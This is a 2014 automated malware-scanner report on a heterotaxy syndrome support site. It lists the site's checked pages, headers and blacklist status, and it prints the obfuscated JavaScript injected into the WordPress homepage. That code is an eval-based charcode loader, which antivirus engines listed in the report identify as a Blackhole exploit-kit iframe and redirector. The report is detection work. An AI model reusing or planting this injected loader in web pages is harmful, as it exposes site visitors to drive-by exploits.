New scan:

Malware Scanner report for heterotaxysyndrome.org

Malicious/Suspicious/Total urls checked
1/0/14
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.heterotaxysyndrome.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 07 Sep 2014 16:59:26 GMT
Location: http://heterotaxysyndrome.org/wordpress
Server: Apache
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
clean
http://heterotaxysyndrome.org/wordpress
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 07 Sep 2014 16:59:26 GMT
Location: http://heterotaxysyndrome.org/wordpress/
Server: Apache
Content-Length: 320
Content-Type: text/html; charset=iso-8859-1
clean
http://heterotaxysyndrome.org/wordpress/
200 OK
Content-Length: 47387
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

dbshre=48;try{window.document.body++}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32,3
... 1630 bytes are skipped ...
104,92,102,109,40,94,102,103,100,99,96,37,97,103,94,96,111,71,95,34,34,86,87,110,110,104,93,106,54,33,36,52,53,38,43,36,114,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,89,90,108,108,102,96,109,52,31,36,108,110,31,33,36,33,54,23,93,113,106,100,105,93,108,55,34,34,93,113,106,41,107,103,64,71,79,74,108,107,99,105,94,32,34,37,34,50,24,105,91,111,95,53,40,33,54,116,5,3,119);s="";for(i=0;i-709!=0;i++){if(window.document)s+=ss["fro"+"mCharCo"+"de"](1*asgq[i]-(i%5-5-4));}
z=s;e(s);}}

Antivirus reports:

AntiVir
JS/BlacoleRef.W.266
Avast
JS:Redirector-AFK
Ikarus
Trojan.Script
nProtect
Dropped:Trojan.JS.Agent.ILJ
Comodo
TrojWare.JS.Agent.HZ
McAfee-GW-Edition
JS/Exploit-Blacole.gc
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Trojan:JS/BlacoleRef.W
MicroWorld-eScan
Dropped:Trojan.JS.Agent.ILJ
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Iframe.bgvzbb
F-Secure
Dropped:Trojan.JS.Agent.ILJ
AVG
HTML/Framer
GData
Dropped:Trojan.JS.Agent.ILJ
BitDefender
Dropped:Trojan.JS.Agent.ILJ

http://heterotaxysyndrome.org/wordpress/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/superfish-dropdown-menu/js/superfish.js?ver=3.5.1
200 OK
Content-Length: 3710
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/superfish-dropdown-menu/js/supersubs.js?ver=3.5.1
200 OK
Content-Length: 3298
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/superfish-dropdown-menu/js/jquery.bgiframe.min.js?ver=3.5.1
200 OK
Content-Length: 1517
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/buddypress/bp-groups/js/widget-groups.js?ver=3.5.1
200 OK
Content-Length: 975
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/gtranslate/jquery-translate.js?ver=3.5.1
200 OK
Content-Length: 16301
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-includes/js/comment-reply.min.js?ver=3.5.1
200 OK
Content-Length: 786
Content-Type: application/javascript
clean
http://w.sharethis.com/button/buttons.js
200 OK
Content-Length: 144141
Content-Type: application/x-javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-content/themes/platformpro/sections/features/jquery.cycle.js?ver=2.94
200 OK
Content-Length: 31539
Content-Type: application/javascript
clean
http://heterotaxysyndrome.org/wordpress/wp-includes/js/hoverIntent.min.js?ver=r6
200 OK
Content-Length: 996
Content-Type: application/javascript
clean
http://www.heterotaxysyndrome.org/test404page.js
404 Not Found
Content-Length: 2693
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: heterotaxysyndrome.org

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: heterotaxysyndrome.org
Referer: http://www.google.com/search?q=heterotaxysyndrome.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=heterotaxysyndrome.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://heterotaxysyndrome.org/

Result: heterotaxysyndrome.org is not infected or malware details are not published yet.